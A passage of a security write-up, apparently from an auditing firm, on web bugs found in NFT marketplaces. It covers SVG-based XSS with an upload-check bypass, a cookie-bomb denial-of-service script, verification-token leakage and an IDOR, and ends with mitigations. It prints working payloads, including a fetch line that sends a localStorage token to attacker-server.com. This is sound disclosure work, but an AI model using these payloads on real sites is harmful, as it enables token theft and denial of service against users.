stashh.io:",{"type":27,"tag":101,"props":41337,"children":41339},{"className":201,"code":41338,"language":200,"meta":7,"style":7},"fetch(`https://attacker-server.com/?token_leak=${localStorage.getItem('token')}`);\n",[41340],{"type":27,"tag":84,"props":41341,"children":41342},{"__ignoreMap":7},[41343],{"type":27,"tag":207,"props":41344,"children":41345},{"class":209,"line":210},[41346,41351,41355,41360,41365,41370,41374,41379,41383,41388,41392,41397,41401],{"type":27,"tag":207,"props":41347,"children":41348},{"style":1335},[41349],{"type":33,"value":41350},"fetch",{"type":27,"tag":207,"props":41352,"children":41353},{"style":238},[41354],{"type":33,"value":1343},{"type":27,"tag":207,"props":41356,"children":41357},{"style":1325},[41358],{"type":33,"value":41359},"`https://attacker-server.com/?token_leak=",{"type":27,"tag":207,"props":41361,"children":41362},{"style":214},[41363],{"type":33,"value":41364},"${",{"type":27,"tag":207,"props":41366,"children":41367},{"style":220},[41368],{"type":33,"value":41369},"localStorage",{"type":27,"tag":207,"props":41371,"children":41372},{"style":226},[41373],{"type":33,"value":1041},{"type":27,"tag":207,"props":41375,"children":41376},{"style":1335},[41377],{"type":33,"value":41378},"getItem",{"type":27,"tag":207,"props":41380,"children":41381},{"style":226},[41382],{"type":33,"value":1343},{"type":27,"tag":207,"props":41384,"children":41385},{"style":1325},[41386],{"type":33,"value":41387},"'token'",{"type":27,"tag":207,"props":41389,"children":41390},{"style":226},[41391],{"type":33,"value":10416},{"type":27,"tag":207,"props":41393,"children":41394},{"style":214},[41395],{"type":33,"value":41396},"}",{"type":27,"tag":207,"props":41398,"children":41399},{"style":1325},[41400],{"type":33,"value":17659},{"type":27,"tag":207,"props":41402,"children":41403},{"style":238},[41404],{"type":33,"value":1455},{"type":27,"tag":58,"props":41406,"children":41408},{"id":41407},"svgs",[41409],{"type":33,"value":41410},"SVGs",{"type":27,"tag":36,"props":41412,"children":41413},{},[41414],{"type":33,"value":41415},"After closely analyzing various NFT marketplaces, we noticed a common shared feature; the ability to update profile pictures or insert NFT assets using SVG files. SVG is an XML- based format that defines graphics and how they interact.",{"type":27,"tag":36,"props":41417,"children":41418},{},[41419],{"type":33,"value":41420},"Unbeknownst to some people, SVG files can contain JavaScript and run arbitrary scripts.",{"type":27,"tag":101,"props":41422,"children":41424},{"className":201,"code":41423,"language":200,"meta":7,"style":7},"\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n\n \u003Csvg xmlns=\"http://www.w3.org/2000/svg\">\n \u003Ctitle>XSS\u003C/title>\n \u003Cscript type=\"text/javascript\">\n alert(document.domain);\n \u003C/script>\n \u003C/svg>\n",[41425],{"type":27,"tag":84,"props":41426,"children":41427},{"__ignoreMap":7},[41428,41474,41511,41518,41548,41580,41608,41616,41632],{"type":27,"tag":207,"props":41429,"children":41430},{"class":209,"line":210},[41431,41436,41441,41446,41450,41455,41460,41464,41469],{"type":27,"tag":207,"props":41432,"children":41433},{"style":226},[41434],{"type":33,"value":41435},"\u003C?",{"type":27,"tag":207,"props":41437,"children":41438},{"style":220},[41439],{"type":33,"value":41440},"xml",{"type":27,"tag":207,"props":41442,"children":41443},{"style":220},[41444],{"type":33,"value":41445}," version",{"type":27,"tag":207,"props":41447,"children":41448},{"style":226},[41449],{"type":33,"value":10380},{"type":27,"tag":207,"props":41451,"children":41452},{"style":1325},[41453],{"type":33,"value":41454},"\"1.0\"",{"type":27,"tag":207,"props":41456,"children":41457},{"style":220},[41458],{"type":33,"value":41459}," encoding",{"type":27,"tag":207,"props":41461,"children":41462},{"style":226},[41463],{"type":33,"value":10380},{"type":27,"tag":207,"props":41465,"children":41466},{"style":1325},[41467],{"type":33,"value":41468},"\"UTF-8\"",{"type":27,"tag":207,"props":41470,"children":41471},{"style":226},[41472],{"type":33,"value":41473},"?>\n",{"type":27,"tag":207,"props":41475,"children":41476},{"class":209,"line":244},[41477,41482,41487,41492,41497,41502,41507],{"type":27,"tag":207,"props":41478,"children":41479},{"style":226},[41480],{"type":33,"value":41481},"\u003C!",{"type":27,"tag":207,"props":41483,"children":41484},{"style":220},[41485],{"type":33,"value":41486},"DOCTYPE",{"type":27,"tag":207,"props":41488,"children":41489},{"style":220},[41490],{"type":33,"value":41491}," svg",{"type":27,"tag":207,"props":41493,"children":41494},{"style":220},[41495],{"type":33,"value":41496}," PUBLIC",{"type":27,"tag":207,"props":41498,"children":41499},{"style":1325},[41500],{"type":33,"value":41501}," \"-//W3C//DTD SVG 1.1//EN\"",{"type":27,"tag":207,"props":41503,"children":41504},{"style":1325},[41505],{"type":33,"value":41506}," \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\"",{"type":27,"tag":207,"props":41508,"children":41509},{"style":226},[41510],{"type":33,"value":13274},{"type":27,"tag":207,"props":41512,"children":41513},{"class":209,"line":270},[41514],{"type":27,"tag":207,"props":41515,"children":41516},{"emptyLinePlaceholder":19},[41517],{"type":33,"value":2062},{"type":27,"tag":207,"props":41519,"children":41520},{"class":209,"line":296},[41521,41525,41530,41535,41539,41544],{"type":27,"tag":207,"props":41522,"children":41523},{"style":39633},[41524],{"type":33,"value":4695},{"type":27,"tag":207,"props":41526,"children":41527},{"style":214},[41528],{"type":33,"value":41529},"svg",{"type":27,"tag":207,"props":41531,"children":41532},{"style":220},[41533],{"type":33,"value":41534}," xmlns",{"type":27,"tag":207,"props":41536,"children":41537},{"style":226},[41538],{"type":33,"value":10380},{"type":27,"tag":207,"props":41540,"children":41541},{"style":1325},[41542],{"type":33,"value":41543},"\"http://www.w3.org/2000/svg\"",{"type":27,"tag":207,"props":41545,"children":41546},{"style":39633},[41547],{"type":33,"value":13274},{"type":27,"tag":207,"props":41549,"children":41550},{"class":209,"line":445},[41551,41555,41560,41564,41568,41572,41576],{"type":27,"tag":207,"props":41552,"children":41553},{"style":39633},[41554],{"type":33,"value":39652},{"type":27,"tag":207,"props":41556,"children":41557},{"style":214},[41558],{"type":33,"value":41559},"title",{"type":27,"tag":207,"props":41561,"children":41562},{"style":39633},[41563],{"type":33,"value":17739},{"type":27,"tag":207,"props":41565,"children":41566},{"style":238},[41567],{"type":33,"value":38499},{"type":27,"tag":207,"props":41569,"children":41570},{"style":39633},[41571],{"type":33,"value":39687},{"type":27,"tag":207,"props":41573,"children":41574},{"style":214},[41575],{"type":33,"value":41559},{"type":27,"tag":207,"props":41577,"children":41578},{"style":39633},[41579],{"type":33,"value":13274},{"type":27,"tag":207,"props":41581,"children":41582},{"class":209,"line":867},[41583,41587,41591,41595,41599,41604],{"type":27,"tag":207,"props":41584,"children":41585},{"style":39633},[41586],{"type":33,"value":39652},{"type":27,"tag":207,"props":41588,"children":41589},{"style":214},[41590],{"type":33,"value":39673},{"type":27,"tag":207,"props":41592,"children":41593},{"style":220},[41594],{"type":33,"value":39798},{"type":27,"tag":207,"props":41596,"children":41597},{"style":226},[41598],{"type":33,"value":10380},{"type":27,"tag":207,"props":41600,"children":41601},{"style":1325},[41602],{"type":33,"value":41603},"\"text/javascript\"",{"type":27,"tag":207,"props":41605,"children":41606},{"style":39633},[41607],{"type":33,"value":13274},{"type":27,"tag":207,"props":41609,"children":41610},{"class":209,"line":892},[41611],{"type":27,"tag":207,"props":41612,"children":41613},{"style":238},[41614],{"type":33,"value":41615}," alert(document.domain);\n",{"type":27,"tag":207,"props":41617,"children":41618},{"class":209,"line":1475},[41619,41624,41628],{"type":27,"tag":207,"props":41620,"children":41621},{"style":39633},[41622],{"type":33,"value":41623}," \u003C/",{"type":27,"tag":207,"props":41625,"children":41626},{"style":214},[41627],{"type":33,"value":39673},{"type":27,"tag":207,"props":41629,"children":41630},{"style":39633},[41631],{"type":33,"value":13274},{"type":27,"tag":207,"props":41633,"children":41634},{"class":209,"line":2065},[41635,41640,41644],{"type":27,"tag":207,"props":41636,"children":41637},{"style":39633},[41638],{"type":33,"value":41639}," \u003C/",{"type":27,"tag":207,"props":41641,"children":41642},{"style":214},[41643],{"type":33,"value":41529},{"type":27,"tag":207,"props":41645,"children":41646},{"style":39633},[41647],{"type":33,"value":13274},{"type":27,"tag":36,"props":41649,"children":41650},{},[41651,41653,41660],{"type":33,"value":41652},"Although some marketplaces restrict the upload of SVG files, we discovered a way to bypass these checks. One particular instance involved the ",{"type":27,"tag":47,"props":41654,"children":41657},{"href":41655,"rel":41656},"https://xtingles.com/",[51],[41658],{"type":33,"value":41659},"xtingles Marketplace",{"type":33,"value":1041},{"type":27,"tag":36,"props":41662,"children":41663},{},[41664],{"type":33,"value":41665},"Even though the file extension was validated based on its name, the content type was not checked. By renaming a file with an allowed extension and inserting an SVG file with the content type \"svg+xml,\", we were able to successfully upload the SVG file.",{"type":27,"tag":36,"props":41667,"children":41668},{},[41669],{"type":33,"value":41670},"Below, we show you how we did it.",{"type":27,"tag":36,"props":41672,"children":41673},{},[41674],{"type":33,"value":41675},"Request when the original SVG was sent, showing it is not accepted as format:",{"type":27,"tag":36,"props":41677,"children":41678},{},[41679],{"type":27,"tag":126,"props":41680,"children":41682},{"alt":7,"src":41681},"/posts/web2-bug-repellant-instructions/svg-1.png",[],{"type":27,"tag":36,"props":41684,"children":41685},{},[41686],{"type":33,"value":41687},"After changing the extension inside the file name.",{"type":27,"tag":36,"props":41689,"children":41690},{},[41691],{"type":27,"tag":126,"props":41692,"children":41694},{"alt":7,"src":41693},"/posts/web2-bug-repellant-instructions/svg-2.png",[],{"type":27,"tag":58,"props":41696,"children":41698},{"id":41697},"svgs-return",[41699],{"type":33,"value":41700},"SVGs Return",{"type":27,"tag":36,"props":41702,"children":41703},{},[41704],{"type":33,"value":41705},"We'll give credit where it's due. Some marketplaces mitigate the impact of XSS by storing images in IPFS, Amazon S3 buckets, or CloudFront.",{"type":27,"tag":36,"props":41707,"children":41708},{},[41709],{"type":33,"value":41710},"Unfortunately, this mitigation is still susceptible to a \"cookie bomb\" attack.",{"type":27,"tag":36,"props":41712,"children":41713},{},[41714],{"type":33,"value":41715},"This type of attack overwhelms a web server with an excessive number of cookies and can be used to achieve a Denial of Service (DoS), preventing users from accessing the file on the third-party service.",{"type":27,"tag":101,"props":41717,"children":41721},{"className":41718,"code":41719,"language":41720,"meta":7,"style":7},"language-jsx shiki shiki-themes slack-dark","\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\" \"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\n\n \u003Csvg xmlns=\"http://www.w3.org/2000/svg\">\n \u003Ctitle>XSS\u003C/title>\n \u003Cscript type=\"text/javascript\">\n var Take_Domain = window.location.hostname.split('.').slice(-2).join('.');\n var Set_Cookie = Array(10000).join('a');\n\n for (var i = 1; i \u003C 99; i++) {\n document.cookie = 'Cookie' + i + '=' + Set_Cookie + ';Domain=' + Take_Domain;\n }\n \u003C/script>\n \u003C/svg>\n","jsx",[41722],{"type":27,"tag":84,"props":41723,"children":41724},{"__ignoreMap":7},[41725,41764,41795,41802,41829,41860,41887,41895,41903,41910,41922,41997,42005,42020],{"type":27,"tag":207,"props":41726,"children":41727},{"class":209,"line":210},[41728,41732,41736,41740,41744,41748,41752,41756,41760],{"type":27,"tag":207,"props":41729,"children":41730},{"style":226},[41731],{"type":33,"value":41435},{"type":27,"tag":207,"props":41733,"children":41734},{"style":220},[41735],{"type":33,"value":41440},{"type":27,"tag":207,"props":41737,"children":41738},{"style":220},[41739],{"type":33,"value":41445},{"type":27,"tag":207,"props":41741,"children":41742},{"style":226},[41743],{"type":33,"value":10380},{"type":27,"tag":207,"props":41745,"children":41746},{"style":1325},[41747],{"type":33,"value":41454},{"type":27,"tag":207,"props":41749,"children":41750},{"style":220},[41751],{"type":33,"value":41459},{"type":27,"tag":207,"props":41753,"children":41754},{"style":226},[41755],{"type":33,"value":10380},{"type":27,"tag":207,"props":41757,"children":41758},{"style":1325},[41759],{"type":33,"value":41468},{"type":27,"tag":207,"props":41761,"children":41762},{"style":226},[41763],{"type":33,"value":41473},{"type":27,"tag":207,"props":41765,"children":41766},{"class":209,"line":244},[41767,41771,41775,41779,41783,41787,41791],{"type":27,"tag":207,"props":41768,"children":41769},{"style":226},[41770],{"type":33,"value":41481},{"type":27,"tag":207,"props":41772,"children":41773},{"style":220},[41774],{"type":33,"value":41486},{"type":27,"tag":207,"props":41776,"children":41777},{"style":220},[41778],{"type":33,"value":41491},{"type":27,"tag":207,"props":41780,"children":41781},{"style":220},[41782],{"type":33,"value":41496},{"type":27,"tag":207,"props":41784,"children":41785},{"style":1325},[41786],{"type":33,"value":41501},{"type":27,"tag":207,"props":41788,"children":41789},{"style":1325},[41790],{"type":33,"value":41506},{"type":27,"tag":207,"props":41792,"children":41793},{"style":226},[41794],{"type":33,"value":13274},{"type":27,"tag":207,"props":41796,"children":41797},{"class":209,"line":270},[41798],{"type":27,"tag":207,"props":41799,"children":41800},{"emptyLinePlaceholder":19},[41801],{"type":33,"value":2062},{"type":27,"tag":207,"props":41803,"children":41804},{"class":209,"line":296},[41805,41809,41813,41817,41821,41825],{"type":27,"tag":207,"props":41806,"children":41807},{"style":39633},[41808],{"type":33,"value":4695},{"type":27,"tag":207,"props":41810,"children":41811},{"style":214},[41812],{"type":33,"value":41529},{"type":27,"tag":207,"props":41814,"children":41815},{"style":220},[41816],{"type":33,"value":41534},{"type":27,"tag":207,"props":41818,"children":41819},{"style":226},[41820],{"type":33,"value":10380},{"type":27,"tag":207,"props":41822,"children":41823},{"style":1325},[41824],{"type":33,"value":41543},{"type":27,"tag":207,"props":41826,"children":41827},{"style":39633},[41828],{"type":33,"value":13274},{"type":27,"tag":207,"props":41830,"children":41831},{"class":209,"line":445},[41832,41836,41840,41844,41848,41852,41856],{"type":27,"tag":207,"props":41833,"children":41834},{"style":39633},[41835],{"type":33,"value":39652},{"type":27,"tag":207,"props":41837,"children":41838},{"style":214},[41839],{"type":33,"value":41559},{"type":27,"tag":207,"props":41841,"children":41842},{"style":39633},[41843],{"type":33,"value":17739},{"type":27,"tag":207,"props":41845,"children":41846},{"style":238},[41847],{"type":33,"value":38499},{"type":27,"tag":207,"props":41849,"children":41850},{"style":39633},[41851],{"type":33,"value":39687},{"type":27,"tag":207,"props":41853,"children":41854},{"style":214},[41855],{"type":33,"value":41559},{"type":27,"tag":207,"props":41857,"children":41858},{"style":39633},[41859],{"type":33,"value":13274},{"type":27,"tag":207,"props":41861,"children":41862},{"class":209,"line":867},[41863,41867,41871,41875,41879,41883],{"type":27,"tag":207,"props":41864,"children":41865},{"style":39633},[41866],{"type":33,"value":39652},{"type":27,"tag":207,"props":41868,"children":41869},{"style":214},[41870],{"type":33,"value":39673},{"type":27,"tag":207,"props":41872,"children":41873},{"style":220},[41874],{"type":33,"value":39798},{"type":27,"tag":207,"props":41876,"children":41877},{"style":226},[41878],{"type":33,"value":10380},{"type":27,"tag":207,"props":41880,"children":41881},{"style":1325},[41882],{"type":33,"value":41603},{"type":27,"tag":207,"props":41884,"children":41885},{"style":39633},[41886],{"type":33,"value":13274},{"type":27,"tag":207,"props":41888,"children":41889},{"class":209,"line":892},[41890],{"type":27,"tag":207,"props":41891,"children":41892},{"style":238},[41893],{"type":33,"value":41894}," var Take_Domain = window.location.hostname.split('.').slice(-2).join('.');\n",{"type":27,"tag":207,"props":41896,"children":41897},{"class":209,"line":1475},[41898],{"type":27,"tag":207,"props":41899,"children":41900},{"style":238},[41901],{"type":33,"value":41902}," var Set_Cookie = Array(10000).join('a');\n",{"type":27,"tag":207,"props":41904,"children":41905},{"class":209,"line":2065},[41906],{"type":27,"tag":207,"props":41907,"children":41908},{"emptyLinePlaceholder":19},[41909],{"type":33,"value":2062},{"type":27,"tag":207,"props":41911,"children":41912},{"class":209,"line":2092},[41913,41918],{"type":27,"tag":207,"props":41914,"children":41915},{"style":238},[41916],{"type":33,"value":41917}," for (var i = 1; i \u003C 99; i++) ",{"type":27,"tag":207,"props":41919,"children":41920},{"style":214},[41921],{"type":33,"value":18158},{"type":27,"tag":207,"props":41923,"children":41924},{"class":209,"line":2130},[41925,41930,41934,41939,41943,41948,41953,41957,41961,41966,41970,41975,41979,41984,41988,41993],{"type":27,"tag":207,"props":41926,"children":41927},{"style":220},[41928],{"type":33,"value":41929}," document",{"type":27,"tag":207,"props":41931,"children":41932},{"style":226},[41933],{"type":33,"value":1041},{"type":27,"tag":207,"props":41935,"children":41936},{"style":220},[41937],{"type":33,"value":41938},"cookie",{"type":27,"tag":207,"props":41940,"children":41941},{"style":226},[41942],{"type":33,"value":40169},{"type":27,"tag":207,"props":41944,"children":41945},{"style":1325},[41946],{"type":33,"value":41947},"'Cookie'",{"type":27,"tag":207,"props":41949,"children":41950},{"style":226},[41951],{"type":33,"value":41952}," + ",{"type":27,"tag":207,"props":41954,"children":41955},{"style":220},[41956],{"type":33,"value":4690},{"type":27,"tag":207,"props":41958,"children":41959},{"style":226},[41960],{"type":33,"value":41952},{"type":27,"tag":207,"props":41962,"children":41963},{"style":1325},[41964],{"type":33,"value":41965},"'='",{"type":27,"tag":207,"props":41967,"children":41968},{"style":226},[41969],{"type":33,"value":41952},{"type":27,"tag":207,"props":41971,"children":41972},{"style":220},[41973],{"type":33,"value":41974},"Set_Cookie",{"type":27,"tag":207,"props":41976,"children":41977},{"style":226},[41978],{"type":33,"value":41952},{"type":27,"tag":207,"props":41980,"children":41981},{"style":1325},[41982],{"type":33,"value":41983},"';Domain='",{"type":27,"tag":207,"props":41985,"children":41986},{"style":226},[41987],{"type":33,"value":41952},{"type":27,"tag":207,"props":41989,"children":41990},{"style":220},[41991],{"type":33,"value":41992},"Take_Domain",{"type":27,"tag":207,"props":41994,"children":41995},{"style":226},[41996],{"type":33,"value":241},{"type":27,"tag":207,"props":41998,"children":41999},{"class":209,"line":2168},[42000],{"type":27,"tag":207,"props":42001,"children":42002},{"style":214},[42003],{"type":33,"value":42004}," }\n",{"type":27,"tag":207,"props":42006,"children":42007},{"class":209,"line":4095},[42008,42012,42016],{"type":27,"tag":207,"props":42009,"children":42010},{"style":39633},[42011],{"type":33,"value":41623},{"type":27,"tag":207,"props":42013,"children":42014},{"style":214},[42015],{"type":33,"value":39673},{"type":27,"tag":207,"props":42017,"children":42018},{"style":39633},[42019],{"type":33,"value":13274},{"type":27,"tag":207,"props":42021,"children":42022},{"class":209,"line":4103},[42023,42027,42031],{"type":27,"tag":207,"props":42024,"children":42025},{"style":39633},[42026],{"type":33,"value":41639},{"type":27,"tag":207,"props":42028,"children":42029},{"style":214},[42030],{"type":33,"value":41529},{"type":27,"tag":207,"props":42032,"children":42033},{"style":39633},[42034],{"type":33,"value":13274},{"type":27,"tag":36,"props":42036,"children":42037},{},[42038],{"type":33,"value":42039},"As a result, we're able to prevent the user from loading images.",{"type":27,"tag":28,"props":42041,"children":42043},{"id":42042},"authentication",[42044],{"type":33,"value":42045},"Authentication",{"type":27,"tag":36,"props":42047,"children":42048},{},[42049],{"type":27,"tag":942,"props":42050,"children":42051},{},[42052,42054,42061],{"type":33,"value":42053},"The door could not be heard slamming; they had probably left it open, as is the custom in homes where a ",{"type":27,"tag":47,"props":42055,"children":42058},{"href":42056,"rel":42057},"https://auth0.com/docs/get-started/identity-fundamentals/authentication-and-authorization",[51],[42059],{"type":33,"value":42060},"great misfortune has occured",{"type":33,"value":1041},{"type":27,"tag":58,"props":42063,"children":42065},{"id":42064},"verification-token-leakage",[42066],{"type":33,"value":42067},"Verification Token Leakage",{"type":27,"tag":36,"props":42069,"children":42070},{},[42071],{"type":33,"value":42072},"When a user signs up for a service or creates an account that requires email verification, the system generates a unique token and sends it to the provided email address.",{"type":27,"tag":36,"props":42074,"children":42075},{},[42076],{"type":33,"value":42077},"This token is usually a random combination of letters, numbers, and symbols that are designed to be difficult to guess. The user is then instructed to verify their email by clicking a link that was sent to their inbox. However, if the email verification flow is not implemented correctly, it can result in security vulnerabilities.",{"type":27,"tag":36,"props":42079,"children":42080},{},[42081,42086],{"type":27,"tag":942,"props":42082,"children":42083},{},[42084],{"type":33,"value":42085},"Proof of Concept",{"type":33,"value":42087},"\nWhile reviewing the Tensor website source code, we found a feature that allowed us to send verification emails to any email with a spoofed verification link. This could potentially result in the leakage of email verification codes, enabling an attacker to associate a victim’s email with their own account.",{"type":27,"tag":36,"props":42089,"children":42090},{},[42091],{"type":33,"value":42092},"Here's the breakdown.",{"type":27,"tag":36,"props":42094,"children":42095},{},[42096],{"type":33,"value":42097},"First, we send the verification link to a user's email:",{"type":27,"tag":38608,"props":42099,"children":42100},{"style":38610},[42101],{"type":27,"tag":126,"props":42102,"children":42106},{"src":42103,"alt":42104,"style":42105},"/posts/web2-bug-repellant-instructions/token-leakage.png","token-leakage","max-height:650px;",[],{"type":27,"tag":36,"props":42108,"children":42109},{},[42110],{"type":33,"value":42111},"If the user clicks on the spoofed URL, their token will be stolen, allowing the attacker to link their account to the victim’s email.",{"type":27,"tag":58,"props":42113,"children":42115},{"id":42114},"idor",[42116],{"type":33,"value":42117},"IDOR",{"type":27,"tag":36,"props":42119,"children":42120},{},[42121],{"type":27,"tag":942,"props":42122,"children":42123},{},[42124,42126,42133],{"type":33,"value":42125},"As Gregor Samsa awoke one morning from uneasy dreams he found himself transformed in his bed into a gigantic ",{"type":27,"tag":47,"props":42127,"children":42130},{"href":42128,"rel":42129},"https://cheatsheetseries.owasp.org/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.html",[51],[42131],{"type":33,"value":42132},"insect",{"type":33,"value":1041},{"type":27,"tag":36,"props":42135,"children":42136},{},[42137,42139,42145],{"type":33,"value":42138},"During a security assessment of the ",{"type":27,"tag":47,"props":42140,"children":42143},{"href":42141,"rel":42142},"https://rocki.com",[51],[42144],{"type":33,"value":38546},{"type":33,"value":42146},", a critical vulnerability known as an Insecure Direct Object Reference (IDOR) was identified within the social link modification functionality. Exploiting this vulnerability enables an attacker to modify the social media links of other users without proper authorization.",{"type":27,"tag":36,"props":42148,"children":42149},{},[42150],{"type":33,"value":42151},"The specific vulnerable endpoint was identified as a POST request to /api/user/modifySocialLink, which is responsible for handling requests to update social media links associated with user accounts. This endpoint requires two parameters: \"newLink\" to specify the desired social media link and \"id\" to indicate the user's ID.",{"type":27,"tag":36,"props":42153,"children":42154},{},[42155],{"type":33,"value":42156},"Now, to exploit this vulnerability, an attacker can intercept or modify the request being sent to the \"POST /api/user/modifySocialLink\" endpoint. By manipulating the \"id\" parameter with the user ID of another user, the attacker is able to bypass proper authorization checks and modify the social media link associated with the targeted user's account.",{"type":27,"tag":36,"props":42158,"children":42159},{},[42160,42162,42168,42170,42175],{"type":33,"value":42161},"Here is an example of a request that modifies another user's social media link to ",{"type":27,"tag":84,"props":42163,"children":42165},{"className":42164},[],[42166],{"type":33,"value":42167},"https://evil.com/",{"type":33,"value":42169},". To achieve this, we simply changed the ",{"type":27,"tag":84,"props":42171,"children":42173},{"className":42172},[],[42174],{"type":33,"value":10773},{"type":33,"value":42176}," field value to one that belongs to another user:",{"type":27,"tag":36,"props":42178,"children":42179},{},[42180],{"type":27,"tag":126,"props":42181,"children":42183},{"alt":7,"src":42182},"/posts/web2-bug-repellant-instructions/idor-1.png",[],{"type":27,"tag":36,"props":42185,"children":42186},{},[42187],{"type":33,"value":42188},"The following screenshot is the response to our request:",{"type":27,"tag":36,"props":42190,"children":42191},{},[42192],{"type":27,"tag":126,"props":42193,"children":42195},{"alt":7,"src":42194},"/posts/web2-bug-repellant-instructions/idor-2.png",[],{"type":27,"tag":28,"props":42197,"children":42199},{"id":42198},"preventative-action-steps-for-marketplaces",[42200],{"type":27,"tag":12606,"props":42201,"children":42202},{},[42203],{"type":33,"value":42204},"Preventative Action Steps for Marketplaces",{"type":27,"tag":36,"props":42206,"children":42207},{},[42208],{"type":33,"value":42209},"To mitigate the vulnerabilities we’ve discussed, NFT marketplaces must prioritize the implementation of robust security measures. Below, we outline potential mitigations that can help platforms enhance their security posture and protect users and their valuable digital assets.",{"type":27,"tag":36,"props":42211,"children":42212},{},[42213,42215,42221,42223,42229],{"type":33,"value":42214},"First and foremost, NFT marketplaces should prioritize security by strengthening their input validation and output encoding processes. This can be done by encoding untrusted data with HTML entities in backend or using ",{"type":27,"tag":84,"props":42216,"children":42218},{"className":42217},[],[42219],{"type":33,"value":42220},"innerText",{"type":33,"value":42222}," instead of ",{"type":27,"tag":84,"props":42224,"children":42226},{"className":42225},[],[42227],{"type":33,"value":42228},"innerHTML",{"type":33,"value":42230}," in client-side:",{"type":27,"tag":101,"props":42232,"children":42234},{"className":201,"code":42233,"language":200,"meta":7,"style":7},"document.getElementById('nftCollectionName').innerText = nftCollectionName;\n",[42235],{"type":27,"tag":84,"props":42236,"children":42237},{"__ignoreMap":7},[42238],{"type":27,"tag":207,"props":42239,"children":42240},{"class":209,"line":210},[42241,42245,42249,42254,42258,42263,42267,42271,42275,42280],{"type":27,"tag":207,"props":42242,"children":42243},{"style":220},[42244],{"type":33,"value":39965},{"type":27,"tag":207,"props":42246,"children":42247},{"style":238},[42248],{"type":33,"value":1041},{"type":27,"tag":207,"props":42250,"children":42251},{"style":1335},[42252],{"type":33,"value":42253},"getElementById",{"type":27,"tag":207,"props":42255,"children":42256},{"style":238},[42257],{"type":33,"value":1343},{"type":27,"tag":207,"props":42259,"children":42260},{"style":1325},[42261],{"type":33,"value":42262},"'nftCollectionName'",{"type":27,"tag":207,"props":42264,"children":42265},{"style":238},[42266],{"type":33,"value":28014},{"type":27,"tag":207,"props":42268,"children":42269},{"style":220},[42270],{"type":33,"value":42220},{"type":27,"tag":207,"props":42272,"children":42273},{"style":226},[42274],{"type":33,"value":229},{"type":27,"tag":207,"props":42276,"children":42277},{"style":220},[42278],{"type":33,"value":42279}," nftCollectionName",{"type":27,"tag":207,"props":42281,"children":42282},{"style":238},[42283],{"type":33,"value":241},{"type":27,"tag":36,"props":42285,"children":42286},{},[42287],{"type":33,"value":42288},"However, rendering HTML or markdown user input is intended. In these cases, dangerous HTML tags need to be validated and sanitized via consolidated libraries like DomPurify:",{"type":27,"tag":101,"props":42290,"children":42292},{"className":201,"code":42291,"language":200,"meta":7,"style":7},"var sanitizedInput = DOMPurify.sanitize(userInput);\n",[42293],{"type":27,"tag":84,"props":42294,"children":42295},{"__ignoreMap":7},[42296],{"type":27,"tag":207,"props":42297,"children":42298},{"class":209,"line":210},[42299,42303,42308,42312,42317,42321,42326,42330,42335],{"type":27,"tag":207,"props":42300,"children":42301},{"style":214},[42302],{"type":33,"value":1583},{"type":27,"tag":207,"props":42304,"children":42305},{"style":220},[42306],{"type":33,"value":42307}," sanitizedInput",{"type":27,"tag":207,"props":42309,"children":42310},{"style":226},[42311],{"type":33,"value":229},{"type":27,"tag":207,"props":42313,"children":42314},{"style":220},[42315],{"type":33,"value":42316}," DOMPurify",{"type":27,"tag":207,"props":42318,"children":42319},{"style":238},[42320],{"type":33,"value":1041},{"type":27,"tag":207,"props":42322,"children":42323},{"style":1335},[42324],{"type":33,"value":42325},"sanitize",{"type":27,"tag":207,"props":42327,"children":42328},{"style":238},[42329],{"type":33,"value":1343},{"type":27,"tag":207,"props":42331,"children":42332},{"style":220},[42333],{"type":33,"value":42334},"userInput",{"type":27,"tag":207,"props":42336,"children":42337},{"style":238},[42338],{"type":33,"value":1455},{"type":27,"tag":36,"props":42340,"children":42341},{},[42342,42344,42351],{"type":33,"value":42343},"This can effectively mitigate the risk of XSS attacks. With that being said, implementing security measures such as ",{"type":27,"tag":47,"props":42345,"children":42348},{"href":42346,"rel":42347},"https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP",[51],[42349],{"type":33,"value":42350},"Content-Security-Policy",{"type":33,"value":42352}," (CSP) will help ensure that generated content is rendered safely, without compromising the platform's security.",{"type":27,"tag":36,"props":42354,"children":42355},{},[42356],{"type":33,"value":42357},"Furthermore, a key step is for NFT marketplaces to establish strict file upload policies. By conducting thorough checks on file types and content, platforms can prevent the upload of potentially malicious SVG files. Validating both the file extension and content type will significantly reduce the risk of SVG-based XSS attacks, ensuring a safer user experience.",{"type":27,"tag":36,"props":42359,"children":42360},{},[42361,42363,42370],{"type":33,"value":42362},"Another precaution is to implement secure redirect mechanisms. By implementing a server-side allow-list of trusted domains, NFT marketplaces can prevent open redirect vulnerabilities. This ensures that users are directed only to trusted and intended domains, safeguarding them from potential phishing or malicious attacks where the authentication code is leaked. Here we are showing an example of a secure redirect by applying an ",{"type":27,"tag":47,"props":42364,"children":42367},{"href":42365,"rel":42366},"https://www.techtarget.com/whatis/definition/whitelist",[51],[42368],{"type":33,"value":42369},"allow-list",{"type":33,"value":42371}," :",{"type":27,"tag":101,"props":42373,"children":42375},{"className":201,"code":42374,"language":200,"meta":7,"style":7},"const allowDomains = ['https://allowed-domain'];\nif (!allowDomains.includes(domain)) {\n throw new ApolloError('invalid domain');\n}\n",[42376],{"type":27,"tag":84,"props":42377,"children":42378},{"__ignoreMap":7},[42379,42408,42449,42478],{"type":27,"tag":207,"props":42380,"children":42381},{"class":209,"line":210},[42382,42386,42391,42395,42399,42404],{"type":27,"tag":207,"props":42383,"children":42384},{"style":214},[42385],{"type":33,"value":16931},{"type":27,"tag":207,"props":42387,"children":42388},{"style":220},[42389],{"type":33,"value":42390}," 